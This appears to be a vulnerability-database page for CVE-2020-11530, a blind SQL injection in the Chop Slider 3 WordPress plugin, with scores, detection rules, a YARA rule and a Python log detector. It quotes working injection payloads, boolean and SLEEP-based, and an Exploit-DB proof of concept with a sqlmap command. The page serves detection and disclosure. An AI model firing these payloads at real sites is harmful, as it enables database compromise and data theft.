CVE-2020-11530
published 2020-05-08
Priority P186 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 95.66% (99.9th percentile)
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| idangero | chop_slider | — | — |
Detection & IOCs (extracted from sources)
url: /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A)
command: GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868
yara:
rule CVE_2020_11530_ChopSlider_SQLi
{
    strings:
        $path = "/wp-content/plugins/chopslider/get_script/index.php"
        // nocase: the request quoted on this page uses lowercase sleep()
        $sleep = "SLEEP" nocase
    condition:
        $path and $sleep
}
- Detect time-based blind SQLi attempts against ChopSlider by monitoring GET requests to /wp-content/plugins/chopslider/get_script/index.php with SQL keywords (SLEEP, SELECT, OR, AND) in the 'id' parameter.
- Alert on HTTP responses with status 200, Content-Type application/javascript, and a body containing '$(document).ready(function()' from the ChopSlider path, combined with a response duration >= 6 seconds, which indicates successful time-based SQLi.
- Boolean-based blind SQLi payloads targeting ChopSlider use OR clauses such as 'id=-3097 OR 2236=2236'; monitor for non-numeric or SQL-expression values in the id GET parameter.
- Time-based blind SQLi payloads use OR SLEEP(N) in the id parameter (e.g., 'id=1111111111 OR SLEEP(5)'); monitor for SLEEP calls in query strings to this endpoint.
- The injection payload must be URL-encoded when sent via GET, and magic_quotes is applied server-side, so detection rules must account for both encoded and decoded forms of SQL metacharacters.
- The Nuclei template uses a 10-second request timeout to accommodate the SLEEP(6) payload; detection infrastructure (WAF, IDS) must be tuned so that it does not drop or time out slow responses before the full duration is observed.
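The detection points above, combined into one access-log check (an added example, not code from any of the sources quoted on this page). It assumes a combined-format log with the request time in seconds appended as the last field; the log lines are constructed. It goes slightly beyond the fixed 6-second threshold by comparing the response time with the delay requested in the payload.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote, unquote_plus

PATH = "/wp-content/plugins/chopslider/get_script/index.php"
# Assumed layout: combined log format with request time (seconds) appended.
LINE = re.compile(r'"GET (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) .* (?P<secs>[\d.]+)$')
SLEEP = re.compile(r"\bsleep\s*\(\s*(\d+)?", re.I)
BOOLEAN = re.compile(r"\b(or|and)\b.+?(=|<|>|\blike\b)", re.I)

def decode_fully(value, rounds=3):
    """Undo nested URL encoding so %2520 and %20 both end up as a space."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def classify(value):
    """Return None for a plain numeric id, else (kind, requested_delay)."""
    if re.fullmatch(r"\d+", value.strip()):
        return None
    m = SLEEP.search(value)
    if m:
        return "time-based", int(m.group(1) or 6)  # 6 s is the page's threshold
    if BOOLEAN.search(value):
        return "boolean-based", None
    return "non-numeric id", None

def analyze(line):
    """Return a finding for a suspicious ChopSlider request, else None."""
    m = LINE.search(line)
    parts = urlsplit(m["target"]) if m else None
    if parts is None or unquote(parts.path) != PATH:
        return None
    for raw in parse_qs(parts.query).get("id", []):
        value = decode_fully(raw)
        verdict = classify(value)
        if verdict:
            kind, delay = verdict
            slow = delay is not None and float(m["secs"]) >= delay
            return {"kind": kind, "id": value, "likely_success": m["status"] == "200" and slow}
    return None

# Constructed log lines (documentation IP, made-up timings), not real traffic.
LOG_FMT = '203.0.113.5 - - [27/Apr/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 512 "-" "-" {}'
SAMPLES = [LOG_FMT.format(PATH + q, t) for q, t in [
    ("?id=3", "0.012"),
    ("?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A)", "6.031"),
    ("?id=1111111111%2520OR%2520SLEEP%25285%2529", "0.020"),
    ("?id=-3097%20OR%202236%3D2236", "0.015"),
]]
```

Running `analyze` over each entry in `SAMPLES` leaves the numeric id unflagged and reports the other three; only the request whose response took at least as long as the requested delay is marked `likely_success`.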
CVSS provenance
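| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |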
GHSA
ghsa_unreviewed·2022-05-24
CVE-2020-11530 [HIGH] GHSA-r26h-642q-j6cg: A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin
VulnCheck
vulncheck·2020·CVSS 9.8
CVE-2020-11530 [CRITICAL] idangero chop_slider Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected: idangero chop_slider
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-27&host_type=src&vulnerability=cve-2020-11530; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Exploit-DB
exploitdb·2020-05-12
CVE-2020-11530 WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection
---
# Exploit Title: ChopSlider3 WordPress Plugin 3.4 - 'id' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: N/A
# Date: 2020-05-12
# Vendor Homepage: https://idangero.us/
# Software Link: https://github.com/idangerous/Plugins
# Version: get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '
WHERE chopslider_id =' . $id);
PoC:
Blind SQL injection:
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or
(SELECT sleep(10))=6868
SQLMap using:
sqlmap -u '
http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111'
--level=5 --risk=3
sqlmap identified the following injection point(s) with a total of 17611
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based bl
Metasploit
WordPress ChopSlider3 id SQLi Scanner
metasploit
The iDangero.us Chop Slider 3 WordPress plugin version 3.4 and prior contains a blind SQL injection in the id parameter of the get_script/index.php page. The injection is passed through GET parameters, and thus must be encoded, and magic_quotes is applied at the server.
Nuclei
nuclei·CVSS 9.8
CVE-2020-11530 [CRITICAL] WordPress Chop Slider 3 - Blind SQL Injection
WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2020-11530
info:
  name: WordPress Chop Slider 3 - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in
http://packetstormsecurity.com/files/157607/WordPress-ChopSlider-3-SQL-Injection.html
http://packetstormsecurity.com/files/157655/WordPress-ChopSlider3-3.4-SQL-Injection.html
http://seclists.org/fulldisclosure/2020/May/26
https://github.com/idangerous/Plugins/tree/master/Chop%20Slider%203
https://idangero.us/